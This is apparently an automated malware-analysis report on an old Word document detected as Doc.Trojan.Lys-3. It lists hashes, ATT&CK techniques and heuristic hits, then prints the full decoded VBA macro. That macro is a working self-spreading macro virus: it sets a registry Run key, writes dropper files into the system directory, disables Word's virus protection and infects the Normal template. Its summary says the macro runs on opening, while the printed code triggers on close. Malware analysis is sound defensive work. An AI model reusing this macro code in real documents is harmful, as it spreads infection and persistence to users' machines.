Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 687523096a18728b…

MALICIOUS

Office (OLE)

27.0 KB Created: 1999-06-19 07:30:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 8b582e60aaeed1400629bb7ece6c12f9 SHA-1: b42b4666be8f381da5d35973af72660ec6d6e809 SHA-256: 687523096a18728b17eb9af44e1965492a4c2d1704e4874775854a64792478b5
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1105 Ingress Tool Transfer

The sample contains a VBA macro that executes upon document opening. This macro attempts to establish persistence by writing a value to the registry Run key 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Jamie'. It also attempts to drop and execute additional malicious files named 'Jamie.vbs', 'Jamie.dll', and 'Jamie.sys' into the C:\WINDOWS\SYSTEM\ directory. The VBA code explicitly constructs the string 'Word.Application' for WScript.CreateObject, indicating a clear intent to leverage Windows Script Host for execution.

Heuristics 5

  • ClamAV: Doc.Trojan.Lys-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Lys-3
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Open "C:\WINDOWS\SYSTEM\Jamie.vbs" For Output As #1
    Print #1, "Set Jamie = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
    Print #1, "Jamie.Options.VirusProtection = False"
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Open "C:\WINDOWS\SYSTEM\Jamie.sys" For Output As #1
    Print #1, "Private Sub Document_Open()"
    Print #1, "ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\Jamie.dll" & Chr(34) & ")"

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1400 bytes
SHA-256: 266a2d62ae30a06dc14301ec77062fc22cbb3167b15d9d837b10587af5d6764f
Detection
ClamAV: Doc.Trojan.Lys-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Jamie") = "C:\WINDOWS\SYSTEM\Jamie.vbs"
ActiveDocument.VBProject.VBComponents.Item(1).Export ("C:\WINDOWS\SYSTEM\Jamie.dll")
Open "C:\WINDOWS\SYSTEM\Jamie.vbs" For Output As #1
Print #1, "Set Jamie = WScript.CreateObject(" & Chr(34) & "Word.Application" & Chr(34) & ")"
Print #1, "Jamie.Options.VirusProtection = False"
Print #1, "Jamie.Options.SaveNormalPrompt = False"
Print #1, "Jamie.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile(" & Chr(34) & "C:\WINDOWS\SYSTEM\Jamie.sys" & Chr(34) & ")"
Print #1, "Jamie.Application.Quit"
Close #1
Open "C:\WINDOWS\SYSTEM\Jamie.sys" For Output As #1
Print #1, "Private Sub Document_Open()"
Print #1, "ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile (" & Chr(34) & "C:\WINDOWS\SYSTEM\Jamie.dll" & Chr(34) & ")"
Print #1, "With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule"
Print #1, "For x = x To 3"
Print #1, ".DeleteLines 1"
Print #1, "Next"
Print #1, "End With"
Print #1, "End Sub"
Close #1
End Sub